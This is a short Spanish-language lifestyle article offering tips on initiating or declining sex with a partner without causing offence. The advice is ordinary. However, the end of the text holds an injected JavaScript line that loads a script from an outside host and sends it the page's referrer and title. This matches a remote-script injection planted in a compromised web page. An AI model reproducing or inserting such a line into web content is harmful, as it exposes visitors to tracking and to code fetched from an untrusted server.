Formas inofensivas de iniciar y rechazar a tu pareja

Por Elizabeth Palacios   @ely__palacios

En ocasiones, uno de los integrantes de la pareja es más cachondo y sexoso que el otro, es por esto que les damos algunos tips para iniciar o rechazar a tu pareja sin ser ofensivos.

Para iniciar:

-Sé claro al pedir

Si tienes ganas, dilo claramente, pero de ninguna manera de forma exigente.

-Sé confidente

Si notas que tu pareja tiene menos deseo sexual que tú, habla con ella y pregunta si puedes ayudar en algo, que te tenga confianza para decirte si es estrés o algo psicológico.

-Escucha

Cuando la pareja tiene problemas, lo que más desea es ser escuchada, atiende sus necesidades de comunicarse contigo, escucha lo que siente.

-No seas grosero

Si tu pareja definitivamente no tiene deseo sexual, es normal que te sientas rechazado o molesto, pero eso no es suficiente motivo para que seas grosero o agresivo.

Rechazar:

-Date una oportunidad

Si no tienes ganas de tener sexo, no te cierres a la posibilidad, déjate llevar por el momento y quizá la temperatura comience a subir y te animes, pero no confundas esto con obligarte a intentarlo.

-Revisa las posibilidades

Recuerda que la penetración no es la única forma de sentir placer, también puedes recurrir a las caricias, besos, relatos eróticos.

-Sé honesto

Dale a tu pareja razones honestas por las que no quieres tener sexo, asume que tú eres el del problema y no la hagas sentir culpable.

-Respeta su reacción

Así como tú tienes derecho a negarte a tener sexo con tu pareja, ella también tiene derecho a sentirse decepcionada al no poder tener sexo contigo, respeta sus sentimientos.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

:)